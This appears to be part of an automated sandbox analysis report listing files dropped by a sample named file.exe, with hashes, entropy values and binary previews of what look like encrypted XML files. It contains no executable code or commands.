          MD5:110FE1E9550BFCBAE080679FE54BB7B0
          SHA1:3E8A888A0471A279E488FA46A94CBB406FC20E6E
          SHA-256:40BA8F765A962A281223991507B02F5F940A9FE6783A3B12C122D3CA98BFD4BF
          SHA-512:351BF48C16D751610D0434724990B366F7A3E019F1A5A3159C5B762E165F315F330BB8B44B58A646951288B0153260AD99168DA7C4139D3D32955406E70A7366
          Malicious:false
          Preview:<?xml..YB3,.,).G..L...W...|N..R<V*.!.N.....&R.(N..X/..X.:...+T..$b....1...<;L...&*...{.%.t...W.:.Mn.J...H...d....,.N......l.r......'v$O0.....(%f.)O.D....G....g..N.?|.....]...M...i.g.s..\.~e......?......V.Q.j..#.S....u.+.....0Z...K...............4......g9W....R........B..6j4.q...g-r. ...&....9.T..iFcI.v.q..k..|.y|.g...y2o...=+-.V#t..`...,.....`q.IZP.7.WS..2.M..\cT....4.aFv:?J....'.f..&*.N.TE...c..&..y.7..1......5T.m5..........3.o...r.(..;;.......^L..q..*.....].-.s...Gb.C.....9..k..._....C....z[.\.....[q.!..itrg.....+4..*...k..v..5...|.R.W/..`.[...F....k=Q......i.a...u..!.SB._.WK;. ..y.1.e..;........j.}...N.[.......7...Aw...j...`3d..w..~$.A}*l<...D......Ze..?.....EM(...Z.....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):801
          Entropy (8bit):7.742066458832604
          Encrypted:false
          SSDEEP:24:ZGXWwLBp0amIbCTnrbx/I+hcVulGVP8k65JBiTkbD:Z8WYL0b9bx7mYwUJAiD
          MD5:29AD6406F845576D279F4412D8C52732
          SHA1:472457AACDDC43370EA3DBF5F1969D6F8431F0D0
          SHA-256:6F5EB3B065DD28CF8402BD0D3040DC4C693BE10FB34126B47C30A3732BDAA79D
          SHA-512:38020F1ADFACE3C6CB3999200648427756AD478DA95A29E61B8EE04BE41BBC1B7C17027FEB955D49DE2C5D2D4C112CC6A1871CDC156E3D107D699F932B6F8CDB
          Malicious:false
          Preview:<?xml!.q([R.]...U3.'i...:~..]...Z.ta......zIU`.=t..........,...>.|..;.L... *N.6]...#.CN\......'[...B...:.HD.AP......+...'i...rM..m.*. ,...y..Lo..@%..H<..$h.....D..[9c..._p.L.K....zO....Uk.X}..si..A.5......{(v..d8S..q+.e..iR..0..O........WR...#.W..l....].i.....A.d...F...}WR.B{j._.....?.qtof.xk....@...2..;.o|.....z.. "..wt7O..[...|.........!N..A..t.....a......P..'.._.~$....2..|?h..+.T{..=U...Q..`j;z.S....+V.wt...K...i..Q.)0...KW...?..A?..?c...c...........>E....O.f....3....=.,....\....S{-...tt.8..8...7'........2V...cj|-...Q.T.).#/.Fi.b...*..b...F......I.....|W.\..w.....U<.G..: <m.9...S._..H..M...(.Y....K..P4.].GL.M.._m.......,x.B..7..k.;@d!..a..).......u.7.+.h.x.K.f..5.fq...k{..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1029
          Entropy (8bit):7.820057069683186
          Encrypted:false
          SSDEEP:24:RlSxTTGmK07FOcM4lofrNjjg555VIFhui0vk5BZyp9jQGiTkbD:RlSNTGmsnfhXhuiU80pCjiD
          MD5:3966A06EC70F80126FEA6EAFF4CDCE3B
          SHA1:9844B9F65F6589F7290701BDAA21DB1C97F45FB1
          SHA-256:4C1811E71DFFA2548A565DAE0564DDACB7E7788DD0B117B9BB76111B3DDC9EC2
          SHA-512:F8068440392AE1FDB57169DE9DC7868D52C205C5702B9B9810A1092983D0EE5CAE17EF5B12B3515A5513DA7F4CA7D67F91FB0003CDD55F03F9370546E0FE9254
          Malicious:false
          Preview:<?xml.E...x....O...@d>.....d.7.......x.w!.N....i$..a+j..:(..q............Y\.zG<.-{! }w.x.p3.|'/@Sz:uQ..B"...B....dE5vc..M.Hn_.........%.._...F..(.f...^..mSZM.$...C7..N.J...zY..a-D...../e.S.....m].M..sZC...0..X.s.>.;...9....\;X...=....}_Z$6 ...R.)1............,...... ...........,....v)A...?..Z....H6..+..b_W.....d6.K7.......~.TCL.OX.@}b.. @.~.y.C...6H)+ld.t...X)g..iSawifMO..".=...^C8.2?N*......t....@.....>t..t.N.\...Q."...9.:.......N6W `v-...F...K...{.9....t.[s.P.{.Y.........F.L....p..k....EP.$....H. {9.....6.p-T"*<y.......7.....|H.j.....9..JE...eJwB..&.z.A........K.....N.....m....../....%o....D....un...x.u.X......0.~..k\....:....5...KF'#....!Et..WS5...4.R+S.Cb....^m.q.S..........BK}...<...8..R........6W.j.I71.p...D.........kNUu..({.h#O.#.o ...P....Xt(>X..'.za..L..q.l3=..X.N........xq..0..2.Z.`......]Ow.N.....*&RF.1.../:..7..J..o....!...c..0l.......S1...D..Z..f..:.g..F....M}M..2*.uP.*..T.'%^.V.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):871
          Entropy (8bit):7.725315405105641
          Encrypted:false
          SSDEEP:24:O2pL+up5j5WNYv/v/QlIiL07iiHdx8EiTkbD:z1Xp95AW/OLhiHr8diD
          MD5:4F4B7195F9FB56DA0804B6FC3E769D87
          SHA1:9FAC016470A0C20633B23733F82180B19994B987
          SHA-256:C8E6B905CD6DE636F97DA5B744B18BDDD8C012CE9DF8172051DA494EB5A4BF5E
          SHA-512:17131569D855A8A5AC3AF4E46E5EA2C042AF66D3753A4725ADE5F20C5F5566810A00F978F05D87F1E7B587B069CA880C1150C654D8BCFCB9E1B70F3F4DD08464
          Malicious:false
          Preview:<?xmlh..|.5..!....>.X8z..%|..%C. !.v.Ig.(-.c..(..=?.S........k.o{Y.x..+T.....%...4r....M.?D.l....*{.B."..+..IJ.........j.~........C.+aq&...+.:.G...&'q.m...G..d...].*...n..f......h.DB...X)ov~.d5p.2tQ.ZV..sJ.6.J.Iq..93..?..k...g...].L#J......q}......z...(.j....s..W..dd.t..FW..(..LS..X.<.t....#....2.N.0...L...s0}.q.b..q.k.V.-{"VTQ....n..-@...S.s./-p.._.M['..H.`Lp.).P>[ ...ni...h9.M!Y......k...H{.1.M....T.4. .....Qy_7j0.....A....Z....!....._..V.g.V>.<......")....W..z.Vjh)..A.......t..^.;....#...KH.....U.X..N.9.PVmY7...C..x.IwW. ~.+.qmG..1S.i..`R...U.........E0..&Es..Q.S.....f...x.\f.1feYg..v?..!..q3.E.#).G...(.z.M.|...m.(-A.....D..H.1.#....p...I....d...R.^E5.*..c..W.@.P../......$.V....afG....v.`ec.2H..-HN.T..e.YK*>.^. .E)....fa..m....F@Ys..3qA.x.s...2qhS.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2217
          Entropy (8bit):7.89776688858839
          Encrypted:false
          SSDEEP:48:HZpbvkPJhYCmPbv/1H8MQyrDRkKPXUp0siMqnhiD:jb8PJhrmPzdcM1r1kKvemZg
          MD5:D0BC2EF05790113698E644B1CAFB2FF9
          SHA1:ACB6216BDA7021C047870EA6952867232073C9F3
          SHA-256:C58443F0EA7CC065427156A0C951E9986BC88655E79E6A23EDEC37C17413D33A
          SHA-512:C999675323B59C88A1DE227BAD33E910BA8E7F975425EBEC556F5E83BDA9AE929BFE0DD5A4680815334079B07695A2931FA0E3A626E4CCE73CE6EBFA58E76553
          Malicious:false
          Preview:<?xml..A.../..r.B..0..(`% ..F%e1..M..Z....m..1.?+:......0.X!<....u...jj..}#./F}..tQ_.....w7...Aql{.._..}.Z....EAt...$4.......@....\^L...A...M.Vv..x ..s.J..bN O.J.j...P.z..f..IY...e....p.....e......&eKS..a..uQ.:(>....,."...6>.x.l.......:.+....A.J.7.,.9.~b..{MO.l..I...<X...z(Z3.....&.....).P.c.......{~...M....uE.c9..pZ....E.fU9....}...a(...?v.3.-D...s.J...E|.....i..'b~.).}.T...X*^..8..Ql$.z.7G%.a...]IW'.<..Y.H...f.).1.....v.W.........3..cUm!.<.=d..T...~.r..W..>.?0.P.....9.v7[l.J...u..c,c..?. ...Fm....M...t..#.b.F...=w[\.pa..N.....!...D..../.8^..Q.........X'..S.....?paR..7.....8.o.R$a....T.f\ .1.......p.s@.C..2z..M...a.....+.`..7.V........pZ.DZ.I....Q\/.#....QF...d.+?.~..$xjq8y...VR...2#...(..'5.}L,...1.....[.2...+...m.-.?.`.?..9v........F.."F.C.e#.:..14...._B..%8.....Q...F..B.RT..,J.m.%..<l..?.,Ps.#.{.6D.3..)"b.....j.*"...:!.o...[*T.......sU,..n<>......=s.(.....<o.=<...k.n..X..*......e..0..jL..l^M..:.R. .|..N~.tWv..*...X._ ..?......
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1987
          Entropy (8bit):7.905271812720306
          Encrypted:false
          SSDEEP:48:Fe/d5oPc55amsUVu/uWDlX80EzO7gHNr+bJiD:NHaNWDls0Ez3HNrJ
          MD5:B101F3308A335B3F68B7CFE9D72AB7C2
          SHA1:56FAC67CB9BFE498F919566534991CF8E52DF66A
          SHA-256:9449D4F6AE86A9BC46452C5C13DD76B14C2D7D7CDCA7B4C47E9619AD20267DC7
          SHA-512:0B4423961CE940208AAFE8180C07E31302EF5C3A0982C828841149A3BEA7765DADC883296D393D167FE65604A729A3443D0FCC3EDEA98892964ABEFBDD79F34C
          Malicious:false
          Preview:<?xml.vP..Y..TBrM......=...j.y..+..j}...`@F.|...v...?@y...=..M....Vj...6...Fa.N.GS...N.....@....ql.*7/X.{.E...?..g..v.ycS5........4......;~.:.V......)|.()(....A.....u......p/@a. .U......:...Lm.V4Y,..A]y...*...[Y._]..L.>....|......N=............Z.l.yN...@70%p...$.../...|.....)...9G...}....?W0..h....)......e,.......0....1C]..=.... ..f3...B{m@dO.*...(.y........#~...lRa+.a.........J&.._....`...........y.~.......}....F.s..Jg5....o@.].rES2m.oy.^.J...Z.......=...K...8s.6N.a..=.+.....qtr....w.../...:......kqh.$..aO......K`.p.p...).W/.]..]...k..:Z..w..&.O.........M.]m.DE.......vhz..j.Y. F.P..B....rY.....E.M...Qm!w...v...Ix.!....2...n.`Q.`..:&.f..P.......-D...,.Q.....kwdUP!....r1<.O.. .sx}.t.y.t.e.P...m-..c.C...`...~}....}.@...2...I}...xI<.*_.....TmSnL.lt......=S6.E+.Br..G.[...S......._....x...cm]S.V..6.k..F..u....:...9....../&t3t...{.B1.0...3.....8q...H#@.........h.@.5 >..P.$..O.{j@;*L..|O.z. n..,Q..(_.K"J...i......=:$+....4..n ..Y..Vl..|z.7..b.Xk.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3851
          Entropy (8bit):7.947177648393305
          Encrypted:false
          SSDEEP:96:Sy67L4grKmCQ6cyfK1uLWhyBfLzMLF5m6cOmSba1:SogrdLn46hy6h54OmeU
          MD5:702305A28B0279FB1705B89ACE1D7CAC
          SHA1:374070515996D3DF5AA670673D4DE197CD9F60D9
          SHA-256:27C51945461E47460DE6C1B6226A759DA33D2146BED85D80FA8F729607037ED1
          SHA-512:A3D8272B564A0E29EF53BA20B8987BC350D3C241994EAB5BB67DF2E2BC1ABD46974AACADD58985FFDE616F82B1815373FB911DAFA94D0749F8CA73BAA216011A
          Malicious:false
          Preview:<?xml... ......P0.......8.W..m....._.#........S..0!..x....P..........%..*.....T.T........*..G.L.....QV. .`.$....WV.]j.Y..@...R.S4b2! Ff...$\...{F... .d.r..ac.~.|.F.w....v..O_.;.#.....Vg..M.....N.j..5..l.....|6.q..?....6.*3.).Fw...e.eH.y..v'&=........c2.U...U#..\C......8...U.IU...&$.g..I..}.b.~.c7.)..#....Z:.-.i.Y6........^U..n.Z.. |D5.[.{A..6,9c.2..%X..Mh...{..4J.0.>.L9.v*....!..!.F9*.,aM....g+ow.=q..e.....:.y...J..h....4......Y.t.*....&x.2._...TH.....7D..F};..m..V...Vu...H.......s.,+l....'m..5eH..5...*>........5.......7..0..Ai..........y......6......8.|.e....^VcP].l........~!..V...C<.X........>R.A.b[53e./De...*......ar<...LbNR.F..U.Z%y..7$.Z............r]@..S.m.N...L.../b{...D".F....Xy..A....`5.....K........"3=P....c8.z..4."...p.u..)...>B.?...Yo...d.$.....U..=v.,..;.S. .f...8..0.l.+.jQ.I.=..}P.9./<.......81\.|.A-.....e..n......{...|[.q1h)k.8.r....`.-.lc..]$...~.'}{..M....0. L....lD*hZB-.$.1V.......p...:'......?.<]...&'@....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3223
          Entropy (8bit):7.935893363185637
          Encrypted:false
          SSDEEP:48:JvtKkkRyEUp7n9idE91LynlGauslMUU87v1sAfGZJBKPBU6HP2f6T2eY4yoriD:JVIe9iOj44auslMUUEsXqqHou
          MD5:F168791A2E14D16907B244F6C3B04B7D
          SHA1:581D4C12EE6C45039F56D89BE9FB2628C27160A6
          SHA-256:A85F6C453112E5B073DC59B4448267E82B94C231A97E045C503AE8EA901EFD40
          SHA-512:E7433146E86A9FFBE1B5704265302273E2382D7A8F071B7F7C8184FAF3D174D7150AC25A38AEEFD6F5F2FC1C220E1E527E8FBA4D87C14507269855E0EB88C9B6
          Malicious:false
          Preview:<?xml.&..[........0IB....'.7..(86.q{~}.>.g..c@....!.4.aj=b.L..K....rx..C.....4.1#z.....6......6t.....k...)B.../v)Fw.3.......6...7....I.h@.....}..3....}....^.Xe..sh.8$8.b...s..s..;...t.\...@..QE......~........$....@....\..[.!n..h.['5)....y..........2...;.}.4[...$.[........t.b.t..!.=..N?G.T..T...m.R.2)V..zM..F[.:q..S..s@..:....z:.:F..}8I[.k.z.v..9.2...)....L.u.....+..>?.yV.u..?.,.. ..Ck*./.RX.U#.6.S.x{;.WT........j....LgXi_8NUN.ZOe..d..0.9.9.<..v*..xLYP..^....c=Q)..C..F.Tu.....h.<wP..O/...f.....@R.$.. z.*:.wu..<.9HF.g.........\sgf.FQ.@5..z{g.S.o(.-..h2....(Z..L.....Bq.:.....lZ......H.n..........c......N..D/..^.......g..Z..G..NN..k...* ..:c.f.F.".....F.U.Q.'%f....[.=....D...0..Qd... ......H.n.q.c#..>R.....b.{..>.ya....:.n...i6k....h..8jY...:...O.m..h@R.B.Y..... /c...G.h".U.....b.2..L......U.....20...m.'....z..x.{.Xx...G...$Z...04.5N.'dr.K..9s...._t..%.I...N7...GJ.....|..~.}.-.k..$Q........xhFM....s...:.N...0Q..7..mC.P.r.C.)..=xx/).
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1586
          Entropy (8bit):7.873170699479639
          Encrypted:false
          SSDEEP:48:iXkaCapd52mFTLAkHiDCREOksAtsNB2daUfJOPLBgZV7jZViD:iXHpzWCks7NBWfuFgZJG
          MD5:FB69C7EF8A32B561DF2C8992BBA21BEA
          SHA1:0DADA3C43EA43A4A6D05E30B61FCAD5BB6D7101C
          SHA-256:8B8F84815F96D772FE8B555F936E486568C5A0A9BE6EDC4CE75193189702CC91
          SHA-512:A74AD4825B1EE7932DE1C59D1666D69D565F2D57B1DA133531CCFAB813B4F692C5EDCA5B3D970A99DC4BEA61C3BFBF27D25770EBF79126F9511BC3EC745449FA
          Malicious:false
          Preview:<?xml8...P.2.?>2.E,.[.... ./v'.&a|..D...a.3].R....}..f>......HL.NsJ.]c...4....M.u.....&D&k.Yr...e.[.........p..P.....}I.K..#@.R..-.Z4hh..AK...p......c.g.j-.......v......B.......r.3K..?.TH)......Z..V.R..j.b..F..r1.DS...Y.....%Y/....F@.......}.z.,..N".(.5.....)...n.....8..m.Y.\.h..LQ.. ....?.......1.....a...F?*..J..fM.T.Q.....`q...]%....0.nj.-.p|"$...P...E5.o.&/....].3...~.E...../..N.r.....a....l...... ....x...._.;..-.&.....P.&@[g.'...{...NP]....Z..j..{.6a.Im...............z..$....g!....EW.N ]PI...I}C..'G..@.\.......tf.L.....-.6H..9...9~t.{.nj.t......O..">KB.z7.t.4..o.D.3....NB.\..&.G.o.i..:o.] /..8.....J.s-..}>.......!...i.~.c.%p.....4..6.J.I9....J..I.w.S..?N..#V*......!..>..z39!......b..G..P......A..>...d..3.t2..E....)..Ge.{2....7.b.3.....i....l?.[s..)...=...[5.,.2...!..L.YbQ.0.f&-. ..J.1[..ml.M|.nZ......l."...3....|........efc..Ar....G.<..H......nr,V>?*..u.3.,...|P..qY...IZ.........[...[..[...Xt[0.}...$2.....$|~.."....P...=.W\.\..?8..xF
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1572
          Entropy (8bit):7.88166057352954
          Encrypted:false
          SSDEEP:48:X+3t3LNf8Y+YVOaWlhinFaPXNfkZfrJX8AiD:X+9Jf8JWWCnIPdMVM
          MD5:923E78785BE64C4DE35BFFD1DD22DC89
          SHA1:165E325031B8A484145A2AF960B663EDC1073866
          SHA-256:EA575A8B4D4A933348FC6F5C9C79C195908DA236AF2C350C098C1B5A16F3C5EB
          SHA-512:40E792184BCF68657F7C6E4A29FA032457A4B88162BA10F94000A6E4D7C51FDA0C7DA5DF351BF270010913A1A64E4C7773C98B2C8D42AE68AAD7178182EAAF2A
          Malicious:false
          Preview:<?xml.!P:.f]..X%......]....ntA.H.......z..Fj.o..r5..8..A....,=c..5..d.n...y..UR>...p.x....A..;.C..AU...Ix.....L..\..e....?t36?.vK.{....,....yP.:-.H..........@..>.r.b.gB...C..0.1...-....3.I.#.O........'....N.].......i..d.m.Bv.M!.Q....... .....~...Gr...........B.0.?/WDP..P.=.sM"..q.!U.c.H........._l.,.*..'3p.!.......w.G.l.8w...3SbV`..cf.<T.-r.t.L\nR..D.|..zu..#...1...xR.z.....gR.r.....3K.J.Iz.z....G.YZ...$4*..F..f....i.....K....O9s..O(y...c.A.].s_{.(.%...c....Q..=...c_.oz..OD.Y.w*.8....g...r...YvI.G...q1.-.A....Y.._+.`r)...2.H....B..I~..9.t8..F./C.!|....q..A..z...M..?>d.~....R..H:.....M.-.{.AU8.n."....?..>... I....tz<.D....:...;..}~GP..m......Z.:v.&...-wM...........[.....t.....qQH^..0.aRN...Sm......<.[..s.b.I.<....w.....k.a..W..N......i..)...l4.Z....S.JV.$.WJO.P...:.v..8.....LV=.Y.J.7..J....W..0..c......^&.x.aW^Z..*.f.2HT"....S..%.c\.).v3...3...a.zM.~o.,Z.>.......U..{.;...e.......f...^...........{.V.0a..S.s .....?..)X.'f..o...=5.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1978
          Entropy (8bit):7.902226557017582
          Encrypted:false
          SSDEEP:48:IvHSeHKue2cREHFtjEb6eb9rVxsptLZeskiVxdum+ViD:eSu+RwFt8b9YRkiVxduZE
          MD5:15E01E03F53CB402AADC8EE609AD0AA2
          SHA1:6A07FA704CDCB429B407285A844D7D270596BFA2
          SHA-256:289B34A0AF2287EDA63B2B6556A8CE409FD373EEE292D87ED7E1454B6A41D3D1
          SHA-512:DE38F5D4D896A8DC5D37836C06868A807F7B2E859164B24CA95A3563A3C7A2DC04D534197BC275473A96E17EBD7BD74A6DDE32152CFEF39D4BDCC29AD9A83E2A
          Malicious:false
          Preview:<?xmlhm~h..<.zh.~bnYv23.O.B.....D.I.-.c3.l...+....).n.JB..1..r\~......o]'A.... .3.....B.z...j(..c%..].M.m.|.Mlg..m....h.YN%...AN../..#.e.Z.....5..@.....q.8..J(....}P....tH!@.......x.V..$.@K.S... .=...3..8..2.....v.sF..Y......|..b.Y.6..r..[.(o@v..8._."...m.3Mx.-.|f.....n.c......M.g'."...`Qn,npB..W.z.....i$.?o6g%......_,p..<+..G.uV.G....2&....1.x...Q....|.|;.D.7.....S..KU.p*.'0....j.......q..9t-.&....s......../..C.......I%.?b.x......f=..!.B......*.U..(.|.....I......./..B9I.GU,aE:.R(,l...."....&2b......g.V.FL..m....niyZGRs...<H..V]..GP#.......W...ma....+)..h.E..............Y..o8..K.....,....8U......0"...=e.O"...?K.^.Y-:...%8Kx....BE....>D..........L..).. ~.....@..s...X...R....H.@L..c...CX............W.?*z..m5...L.9......*......x.pf/V.P.%.N.*SFl.S.|....1............d...d....../&.......@....,...2C.n.<....l"+.pY...l(8.$B.E(...Y.a.^}..;../....#.'....#Y...z..g..........R.)....~w...9$a.4.M}...D'..9.%.s;..d.Y.....1...p..'R..-..|Z.`o.z......I.C
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1658
          Entropy (8bit):7.885555819806033
          Encrypted:false
          SSDEEP:24:pHnzfYIDlsTZUYVWcVjWLxqJ5GZWs7ICoCkNmkGaH2V8EhSjDEKyNFCfiTkbD:pHESlsTZhWcVqoJ5G5ebGqWCHJy7C6iD
          MD5:7FFA3EDF139B0AB3EA7318B070290EDD
          SHA1:0060957F99C8E9C6648E08FEA67E3741EDDD6297
          SHA-256:2D1DA34BBA1E6103B74B947DF910CD3CE3A71A954E168E7F5BA217A890F3B36E
          SHA-512:4DAB9CA484C131E7CE453FBECE4CF0AFAF2D1A6070D50B02F2E89A9C4C1DED6D60CD2D0EDD07F1B086E2EDD07E43EC21AAAEF1DEDAC9F04184A80EA84DA490C1
          Malicious:false
          Preview:<?xml1....<.9C..3.....mFs.P.......W.......Y.O..{x....*H...w....=.=.*Y...\(0....\M~.."C'..j.5....y`R.....C.cc\}.2vN#"...1..........V..rl....w\.:.2...-.._...+j..e....D.<.B..<.d>.tp...y.Z..->..Ml...C..E.a..+...3>.w....x.|.`..{.r*Y..h...U...............Z.......o....z.+.Vy.z....S.<..S.z..O...u![E.m.M.c..2-t..W.,8*...9+......<h=...(.;a.~=O`8..n...*......|....(`..'s.s.v..&..0..^GY3.Q.4..Y.J .r....O....5P...........fuv......V./........b..:..yy...5L..\+...u.zb..A5..........P.?..I..3wA...]...&...I......E.....[..R".K...m...nl|.D.r..OKg.fnl.......$`.}?;%.\].a.....QL..N4...-'..|4.....JGhX...Rg....kD6.x....O..W>..at..;R...+U.."...C.{.:.2..=..w.[....G......q.+%.E...q......I...|I.p.q.W.......r.>....A)*r..1.~....T....j.:.-..G.5b.(.0r...*|.C....o...U..J.g.,.._.&..P..%..(.&.0n..}..G.&.HJ6...4..D.zNiV..>.V.l2.......Q....n..]...;n9D....~...e'...|..6G.&dP..r.}.^<...D.XP.&.|E..v4.r3.....&c...RK.-@.r.!.;.........n.).(8.u..t.&..W.N.a.L...F....0..@..m..J.L...=Q..!.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1698
          Entropy (8bit):7.867351046214041
          Encrypted:false
          SSDEEP:24:KMu4/2VTFQgErGCVHAlqqRO3BblVfNsZMHmOltY/oJ2/8WMvpCOHwqQxGiTECodF:v/4TSKJRQB7fmy7D0EkqG++svciD
          MD5:CBE3162B1277B586B79081C143D4381D
          SHA1:CAACD7751EA268FEAECEA796F6166CB0172188AA
          SHA-256:406BA57AD7B699559D109A0E3CA71774C5AB0CCBFB90D723D3F3A75E64ADB0D0
          SHA-512:737C74F8E0201CCEFEF600D5FB856998BF2601AE9BF29EC97994245888FB1DBC091AB4138FEA7C8CA613D306244C618B3386734B8E9540324325E3AB5DBE4157
          Malicious:false
          Preview:<?xml../R..9........Y.SF,./*....gx...s....o&h`.G.d:..<........V.xq.:Zl..fj&.r$..L.F'.K..3.(..$u..`.V-.h3.3./.v..n...2)C9\.....E-..| /..r"...*.@O.C..y.<....r...(.7).9.......OeH..X.X.....x.7J.'...r.6.D....)...Q.}V......P.....p..A]"E.n.d.m.d.v....d-M3.<l..A..........hy..Y.....G.F.ExW.u. ..RG.v.3.7.d...u...C6......wEJ.c...~r\X....G..G..S;A.e....4.k...S@'.YO...l.K.>.'$..8.Q.v5.A..2......$.d.seO1..-......Y......CJ.....N.!6&..h.;gZ.......h...|.Y..R.-9...(..t.7..=:ad.....8..P.M....q4....'...o....7..9.....`...z......`..i.fspS....9.0.w.......#.a*...&W.4.....Pk....W.l........OL;.....P...1b1$..[.X.p\...I_W.....v...i...:.R...U\/,..R0.....: ...'-.=.(..+W..lg.......%...5..y|1..p.t...||4..."R..,..TxJ-...v.Ig...}CX4V.r.T.0..x$v.....=G.G`.0..D......J:<Sa.:.g.....E.......e.&N~..}..&.}..o......~....p...t./.X%A.g~..x.n.6..2....R.2r..D..j...@.xr......,Ef....v.o..M.|.@.a.o....X. ..K.PLr..,.E...<...-r.]..E.].]/b..3.9...7b.'.|..b....rW9...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):766
          Entropy (8bit):7.7192622376684445
          Encrypted:false
          SSDEEP:12:wvWwu3MPwUBrMAnuJquNKyvurfYr9Gffxm/PcwGmoZuujwAZRz/3jGxgAixpZacq:wvEMPfrIwwBo3Hxm/LAbF/TGxgAiTkbD
          MD5:0A22326E8482340821F2925138112F58
          SHA1:5F106D0586CDF54445D922B4DCDC458AB426FC9C
          SHA-256:B5AEEF747C668863AD79770162A8A2CB12C774011C73EF1F17092F9E8105A539
          SHA-512:32A5AE7D2E611C5B65DCEB7E00242A4F3C4C0E316EA58DEDC8653CC27568F9736F3A7C5C308868741322BA732090E4136655990D3A1927542F008E41BA256630
          Malicious:false
          Preview:<?xml......r.0.pS.=i.vD.%..-.D.Q.......,:.w.<._...............({......2.dY.Lyx...<._.b^.....wa.w..tB...V.yP.Ij|.....b....D.....%0.;.i:.k..2b(R. .Z.!1.-<..,/.Cu..a..4W...u......8.0.h^........8C..p...%..f...cJuB.`.G.....n?,1.JA#..U.g......=q..!.J)...}=..g.k..v...e.....r.#.....7q'......+K..`.>..[J.6._..{.......,....A..:.B...4.....(....b..W.X.$...._<WSu..h.f.....VB.t.K...f..#f.............B.n..L..i\.g.U>.*2.8(b.)..?H..6w..q`Js&.P.....1R.....6......@...Z;.3....x.GY$.0.....Pl&.o..y.o.\..8&.Rb..r5..e..rA..S,3....xW.4....i.D.l<0.p.`.v.Z....{..m.Qd.rim.*P..t......w.@.P.8.(..6`...C..d...&.{A.*.5&I.w...X....E.....r....d........2.....*.iIh......!Z.q.Y....e...Nr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1037
          Entropy (8bit):7.819571438238709
          Encrypted:false
          SSDEEP:24:5kvpJeWPeENFAR/MvFqzvzkiBkMv7mZaMzHuIurF/uIbBiTkbD:5kvfmEbFqzY0kMv4/z4BEiD
          MD5:2DBD8BF732DD42E1CB50361590C1BA91
          SHA1:A40A3423413262711A7E1EA59AE2C3500A9EEE9C
          SHA-256:69E15F329FBD0DA96A4177B56051F893B58BB305DEF6BFAB977B6E191F3726E8
          SHA-512:51AD3E53E3063FB7181CED668E86243AAEB7B2A497C30EDA6E649DFBF0B43D259877AF87465C5E23496C13998579CDA449EC7C554149A69F059B1B2C16EE073C
          Malicious:false
          Preview:<?xml....}....-..5.~.j...G...%.U..CM.......h.%..b.k.E......?.....zyW.M...S.]U..xwN..m...k..3..3fz.v...\*Q.%"..wt..Zyq1z...........LpXp....8+.......(.....+.+'..%....g3..D..#.J...MS$..2-..R...].N}...`..c.`).MO......p.N.....~I..K..T..Av.S0.A.t).....7.N6V%....IY..B.`.C........<..l.Z....T..o.".PP..<k.zD..'.1@..$.r..YZ!g.....}>.7.E.u....d...+.^*....e.OK...4...L5..].3...a8..G..}p.,....P.rY....pq...I_..{..#.....VU........L.....G...F...."....(Q....e....&&.V....qc.e.o.a7..k.[....>Z..pY7r.-.BX>.k....w..y8...|...Z..........:&.h..q].y....NK......6#..U.-.&.....P...vQ..!...dF5^.~(.j..^...;.:.;:H....Lo.~..ww.f.X.\....j..az..G.....j.PX.u^A.B.....d...Q..u..c...S+..W...q...."Z..1\.._.'.2k.B....i....:.......4cr..3.Zx......{...~.+_...."...)d.?.V..du.B....9.=&d..<.]O......{V...sn.."Y%..5.....VoSk.,.Y..c8-..7..Y..G....!#e. Sw..D...n=>..Ji.)t....V{.xd%.(G.p.....).D.........r..L..(%.)e..B.)DA..4.......l?..`.~.....xi..@...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):920
          Entropy (8bit):7.79158702110299
          Encrypted:false
          SSDEEP:24:+Nmgdqu88/V2vQvNX7ajAL+Fr4X5KmRKqo3z9NDiyiTkbD:+NmgdquDZ7ajKs4JK8JIz9oHiD
          MD5:BB7B43641630827305297231432274CC
          SHA1:98B43954E819C5DEFA9B174A9CF88A5808035235
          SHA-256:FBD8DC7A296CC2C995F4D20FE9B852227A8143B6D207CA9B5BC0A02E520F6F11
          SHA-512:2180ECB770A32B5F4207C4AAE9E344F7BDB5B24AE35E455F39D457B096BD8A402F31BD93F3C08265802402AEF861C1B5680FD96921D016674D8EC6065CA95FE7
          Malicious:false
